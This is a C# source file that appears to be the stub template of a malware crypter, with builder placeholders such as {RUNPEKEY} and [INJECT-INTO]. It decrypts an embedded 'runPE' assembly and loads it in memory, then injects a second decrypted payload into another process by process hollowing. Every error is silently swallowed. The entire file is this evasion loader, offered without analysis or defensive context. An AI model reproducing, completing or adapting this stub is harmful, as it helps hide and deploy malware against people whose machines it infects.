using System;
using System.Resources;
using System.Reflection;
using System.Security.Cryptography;
using System.Text;
using System.IO;

namespace Lawl
{
    class Program
    {
        static void Main()
        {
            try
            {
                ResourceManager MANAGER = new ResourceManager("shank", Assembly.GetExecutingAssembly());
                byte[] b = (byte[])new ResourceManager("shank", Assembly.GetExecutingAssembly()).GetObject("runPE");
                b = Decrypt(b, "{RUNPEKEY}");
                Assembly asm = Assembly.Load(b);
                Type t = asm.GetTypes()[[TYPE-NUMBER]];
                MethodInfo mi = t.GetMethod("[METHOD-NAME]");
                string into = [INJECT-INTO];
                mi.Invoke(Activator.CreateInstance(t), new object[]{Decrypt((byte[])new ResourceManager("shank",
                    Assembly.GetExecutingAssembly()).GetObject("cheese"), "{KEY}"),
                    into});
            }
            catch { }
        }
        
        [DEFAULT-BROWSER]

        [ENCRYPTION]
    }
}